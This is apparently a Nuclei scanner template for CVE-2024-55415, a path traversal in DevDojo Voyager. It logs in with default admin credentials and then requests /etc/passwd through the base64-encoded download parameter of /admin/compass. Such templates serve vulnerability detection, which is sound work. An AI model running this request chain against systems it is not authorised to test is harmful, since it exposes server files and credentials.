id: CVE-2024-55415 info: name: DevDojo Voyager <=1.8.0 - Arbitrary File Read author: iamnoooob,rootxharsh,pdresearch severity: high description: | DevDojo Voyager through 1.8.0 is vulnerable to path traversal at the /admin/compass. impact: | Authenticated attackers can exploit path traversal to read arbitrary files from the server, potentially exposing sensitive configuration files, credentials, and application source code. remediation: | Update DevDojo Voyager to version 1.8.1 or later to address the path traversal vulnerability. reference: - https://www.sonarsource.com/blog/the-tainted-voyage-uncovering-voyagers-vulnerabilities/ - https://github.com/thedevdojo/voyager/blob/1.6/src/Http/Controllers/VoyagerCompassController.php#L213 - https://github.com/thedevdojo/voyager/blob/1.6/src/Http/Controllers/VoyagerCompassController.php#L44 - https://nvd.nist.gov/vuln/detail/CVE-2024-55415 classification: cve-id: CVE-2024-55415 epss-score: 0.63776 epss-percentile: 0.9845 metadata: verified: true max-request: 4 shodan-query: title:"Voyager" tags: cve,cve2024,devdojo,voyager,lfr,lfi,vuln variables: username: "admin@admin.com" password: "password" http: - raw: - | GET /admin/login HTTP/1.1 Host: {{Hostname}} extractors: - type: regex part: body internal: true name: csrf group: 1 regex: - 'name="_token" value="([a-zA-Z0-9]+)"' - raw: - | POST /admin/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _token={{csrf}}&email={{username}}&password={{password}}& matchers: - type: dsl dsl: - "contains(body,'/admin')" - "status_code == 302" condition: and internal: true - raw: - | GET /admin/compass?download={{base64('/etc/passwd')}} HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - regex('root:.*:0:0:', body) - status_code == 200 condition: and # digest: 4a0a0047304502207bcccbb0d156efd39209f69ae49669f7200fc919d62ed000d060e36ce0d4d7460221009c715812d351a32c1ea65a8494a48b0be3cfa860791ee1bb185d6dd6d36ced9c:922c64590222798bb761d5b6d8e72950